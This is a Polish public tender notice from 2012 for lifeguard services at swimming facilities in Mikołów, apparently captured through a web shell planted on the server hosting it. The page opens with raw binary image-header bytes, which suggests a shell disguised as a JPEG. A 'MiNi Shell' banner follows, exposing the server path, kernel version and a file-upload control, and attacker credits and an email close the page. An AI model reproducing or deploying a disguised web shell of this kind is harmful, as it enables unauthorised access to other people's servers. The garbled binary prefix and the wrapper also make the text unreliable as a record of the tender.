JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121126/472738-N-2012.html

<p class="kh_header"><b>Mikołów: Uzupełniające zabezpieczenie ratownicze osób pływających i kąpiących się w Krytej Pływalni Aqua - Plant w Mikołowie przy ul. Konstytucji 3 Maja 22, oraz pełne zabezpieczenie ratownicze na terenie Ośrodka Rekreacyjnego Planty w Mikołowie przy ul. Konstytucji 3 Maja 38.</b><br>
<b>Numer ogłoszenia: 472738 - 2012; data zamieszczenia: 26.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Sportu i Rekreacji w Mikołowie , ul. Konstytucji 3 Maja 31, 43-190 Mikołów, woj. śląskie, tel. 32 779 76 03, faks 32 779 76 03 wew. 27.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mosir.mikolow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Uzupełniające zabezpieczenie ratownicze osób pływających i kąpiących się w Krytej Pływalni Aqua - Plant w Mikołowie przy ul. Konstytucji 3 Maja 22, oraz pełne zabezpieczenie ratownicze na terenie Ośrodka Rekreacyjnego Planty w Mikołowie przy ul. Konstytucji 3 Maja 38..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.1.Kryta Pływalnia Aqua Plant w Mikołowie przy ul. Konstytucji 3 Maja 22 w okresie od 01 stycznia  2013 roku do 31 grudnia 2013 roku.
Przedmiot zamówienia realizowany będzie:
od poniedziałku do niedzieli w godz. od 600 do 2200 w łącznym wymiarze nieprzekraczającym 220 godzin miesięcznie, godziny pracy ratowników będą ustalane najpóźniej do 25 każdego miesiąca na miesiąc następny.
Opis obiektu: basen sportowy 25,00m x 12,50m i głębokości 1,20m do 1,80m; basen rekreacyjno - rehabilitacyjny o wym. 13,50m x 6,00m i głębokości 0,80m do 1,20m, z którego wydzielono strefę hamowania dla zjeżdżalni; jaccuzi o wymiarach 2,00m x 4,00m dla 12 osób, otwartą zjeżdżalnię rurową                 o dł. 46 mb.
Zakres obowiązków obejmuje:
a)przestrzeganie przepisów BHP, dyscypliny pracy i regulaminów obowiązujących na terenie obiektu,
b)obsługa i konserwacja sprzętu basenowego wraz z odpowiedzialnością materialną za ten sprzęt,
c)sterowanie oświetleniem w obrębie hali basenowej i atrakcjami wodnymi zgodnie z instrukcją na pływalni, 
d)zgłaszanie konieczności uzupełnienia sprzętu ratowniczego i medycznego w zależności od potrzeb i terminów ważności ich użycia zgodnie z obowiązującymi standardami bezpieczeństwa i standardami medycznymi,
e)dbanie o stan techniczny sprzętu ratowniczego oraz medycznego będącego na wyposażeniu pływalni,
f)kontrola warunków kąpieli (woda, powietrze),
g)codzienna kontrola (przed uruchomieniem) stanu urządzeń i sprzętu będącego na wyposażeniu hali basenowej,
h)obsługa dźwigu basenowego dla niepełnosprawnych,
i)zapewnienie podstawowej opieki medycznej na terenie pływalni a w uzasadnionych przypadkach wezwanie pogotowia ratunkowego,
j)obsługa sauny zgodnie z instrukcją obowiązującą na pływalni,
k)sygnalizacja za pomocą urządzeń alarmowych wszelkich przekroczeń porządku obowiązującego w hali basenowej,
l)pomoc w organizacji zajęć grupowych (współpraca z prowadzącymi zajęcia) oraz organizowaniu imprez sportowych i zawodów,
m)wpisywanie do dziennika pracy wszelkich informacji związanych z funkcjonowaniem pływalni,
n)współpraca z pozostałymi pracownikami pływalni w zakresie bezpieczeństwa i prawidłowego funkcjonowania obiektu,
o)utrzymywanie czystości w i wokół niecki basenu,
p)utrzymywanie porządku w punkcie medycznym i wykorzystywanie tego pomieszczenia wyłącznie do celów służbowych.
1.2.Ośrodek Rekreacyjny Planty w Mikołowie przy ul. Konstytucji 3 Maja 38  od 21 czerwca 2013 roku do 01 września 2013 roku 
 Przedmiot zamówienia realizowany będzie:
od poniedziałku do niedzieli w godz. od 900 do 1900 przez 3 ratowników  w łącznym wymiarze nieprzekraczającym 2 190 godzin za okres 21 od czerwca 2013 do 01 września 2013.
Zamawiający gwarantuje wynagrodzenie obejmujące następującą ilość godzin w miesiącach:
za miesiąc czerwiec (120 godzin)
za miesiąc lipiec (372 godziny)
za miesiąc sierpień (372 godziny)
za miesiąc wrzesień (12 godzin)
Łącznie gwarantowane wynagrodzenie obejmuje 876 godzin ( łącznie dla 3 ratowników )
Zamawiający zastrzega sobie zmianę terminu wykonywania usług,  w zależności od warunków atmosferycznych  ( wydłużenie, bądź skrócenie terminów realizacji przedmiotu zamówienia).
Zakres obowiązków obejmuje:
a)przestrzeganie przepisów BHP, dyscypliny pracy i regulaminów obowiązujących na terenie Ośrodka Rekreacyjnego Planty,
b)w celu przygotowania kąpieliska do pracy, ratownik jest zobowiązany codziennie stawić się do pracy wcześniej (ok. 30 minut przed otwarciem kąpieliska),
c)systematyczne prowadzenie dziennika pracy ratownika,
d)sumienne wykonywanie obowiązków podczas dyżurów  na powierzonym terenie i nie oddalanie się od niego,
e)interweniowanie w przypadku nie stosowania się i łamania przepisów o bezpieczeństwie i obowiązującego regulaminu,
f)opiekę i nadzór nad:
- sprzętem i urządzeniami ratowniczymi, znajdującymi się na terenie Ośrodka Rekreacyjnego Planty oraz w pomieszczeniach ratownika i lekarskim - przygotowanie sprzętu ratowniczego i pomocniczego przed rozpoczęciem pracy oraz jego zabezpieczenie po zakończeniu pracy,
- oznaczeniem sektorów i stref dla umiejących i nie umiejących pływać ,
- punktem sanitarnym z wyposażeniem apteczki ( wyposażenie w środki dezynfekcyjne i opatrunkowe). Prowadzenie ewidencji pobranych opatrunków. Bieżące informowanie kierownika obiektu o konieczności doposażenia apteczki,
g)wpisywanie na tablicę informację o temperaturze wody i powietrza (min. 2 razy dziennie),
h)wywieszanie i zdejmowanie tablic i flag informacyjnych dotyczących kąpieliska zgodnie z obowiązującymi przepisami,
i)dbanie o czystość i porządek na stanowisku ratowniczym, oraz w pomieszczeniu socjalnym,
j)informowanie gospodarza obiektu o wszelkich sprawach dotyczących pracy na obiekcie,
k)zabezpieczenie całości sprzętu i powierzonego mienia po zamknięciu kąpieliska,
l)oczyszczanie powierzchni wody, ścian basenu i przelewu z osadzających się zanieczyszczeń oraz dna basenu z wszelkich zanieczyszczeń i przedmiotów mogących spowodować skaleczenie lub wypadek,
m)utrzymywanie w należytym porządku i czystości plaży wokół niecki basenowej,
n)pełnienie dyżuru na wyznaczonym stanowisku, stałe obserwowanie powierzchni lustra wody, niezwłoczne reagowanie na każdy sygnał wezwania pomocy oraz podejmowanie akcji ratunkowej,
o)informowanie telefoniczne o wszelkich zaistniałych interwencjach ( Pogotowie ratunkowe, Policja, Straż Pożarna) gospodarza obiektu w ciągu 30 min po wydarzeniu i odnotowanie interwencji w dzienniku pracy ratownika,
p)ratownik sprawujący dyżur może opuścić stanowisko ratownicze i zgłosić gotowość zamknięcia kąpieliska pracownikowi obiektu, dopiero po opuszczeniu przez wszystkich użytkowników obszaru kąpieliska.

2.Usługi w zakresie ratownictwa muszą być świadczone zgodnie z obowiązującymi przepisami w zakresie ratownictwa wodnego.
3.Wykonawca zobowiązany jest do prowadzenia nadzoru w zakresie przestrzegania przez osoby korzystające z obiektów regulaminów na nich obowiązujących.
4.Wykonawca zobowiązany jest do przestrzegania regulaminów BHP i ppoż.
5.Wykonawca w toku wykonywania niniejszej umowy zobowiązuje się wykonywać swoje obowiązki  z należyta starannością.
6.W czasie trwania umowy Zamawiający ma prawo wglądu do przebiegu czasu pracy, przy czym w razie stwierdzenia, że praca jest wykonywana w sposób wadliwy lub niezgodny z umową Zamawiający ma prawo wezwać Wykonawcę do wprowadzenia niezbędnych zmian gwarantujących należyte wykonywanie usługi będącej przedmiotem niniejszej umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.31.72.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku, Wykonawca złoży w tym zakresie oświadczenie o którym mowa w Rozdziale VI pkt 1 lit.  a.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku, Wykonawca złoży w tym zakresie oświadczenie o którym mowa w Rozdziale VI pkt 1 lit.  a.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu tego warunku, Wykonawca złoży w tym zakresie oświadczenie o którym mowa w Rozdziale VI pkt 1 lit.  a.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowanie min 6 osobami zdolnymi do wykonania zamówienia posiadającymi stopień ratownika WOPR</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę min. 60 000,00 zł. brutto</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>b)Formularz ofertowy - wg załącznika nr 1 do SIWZ,
c)pełnomocnictwo do występowania w imieniu Wykonawcy, w przypadku gdy dokumenty składające się na ofertę podpisuje osoba nieuprawniona do reprezentowania Wykonawcy  (zgodnie z odpisem z KRS lub zaświadczeniem o wpisie do ewidencji działalności gospodarczej,
d)pełnomocnictwo do reprezentowania w postępowaniu albo do reprezentowania w postępowania i zawarcia umowy -  w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia,
e)informacji o części zamówienia, której wykonanie Wykonawca powierzy podwykonawcom - wg załącznika nr 3 do SIWZ ( jeżeli dotyczy);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający przewiduje możliwość zmiany postanowień umowy w przypadkach, gdy:
a)nastąpi zmiana powszechnie obowiązujących przepisów prawa ,pod warunkiem, że będzie dotyczyć zakresu mającego wpływ na realizację przedmiotu zamówienia.
b)Zamawiający przewiduje możliwość zmiany strony umowy tj. Wykonawcy w sytuacji wystąpienia sukcesji generalnej, 
c)będzie wymagana zmiana osób wskazanych w przedstawionym przez Wykonawcę, wraz z ofertą przetargową,  wykazie osób przeznaczonych do realizacji usług objętych przedmiotem niniejszej umowy, pod warunkiem braku uzasadnionego sprzeciwu ze strony Zamawiającegoz zastrzeżeniem, iż osoby te będą posiadały, co najmniej takie same uprawnienia jak wymagane  w SIWZ. 
2.Dokonanie zmiany umowy w zakresie jw. wymaga uprzedniego złożenia na piśmie propozycji Wykonawcy wykazującej zasadność wprowadzenia zmian i zgody Zamawiającego wyrażonej w formie pisemnej na jej dokonanie lub przedłożenia propozycji zmiany przez Zamawiającego.
3.Przewiduje się możliwość zmiany zawartej umowy w stosunku do treści, na podstawie której dokonano wyboru Wykonawcy  w zakresie zmiany wynagrodzenia w przypadku zmiany stawki podatku od towarów  i usług (VAT) - wynagrodzenie ulegnie zmianie stosownie do zmiany stawki podatku bez zmiany wynagrodzenia netto, bez konieczności podpisywania aneksu do umowy, począwszy od daty wejścia w życie powołania zmian.
4.Zamawiający przewiduje zmianę terminów realizacji przedmiotu zamówienia (dotyczy rozdziału III pkt 1.2. niniejszej SIWZ - Ośrodek Rekreacyjny Planty w Mikołowie przy ul. Konstytucji 3 Maja 38  od 21 czerwca 2013 roku do 01 września 2013 roku), pod warunkiem, ze maksymalna przewidziana ilość godzin ( 2190) zostanie bez zmian.
5.Zmiana umowy dokonana z naruszeniem powyższych postanowień jest nieważna.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mosir.mikolow.eu, www.bip.mikolow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji w Mikołowie, ul. Konstytucji 3 Maja 31.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.12.2012 godzina 11:00, miejsce: Miejski Ośrodek Sportu i Rekreacji w Mikołowie, ul. Konstytucji 3 Maja 31.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com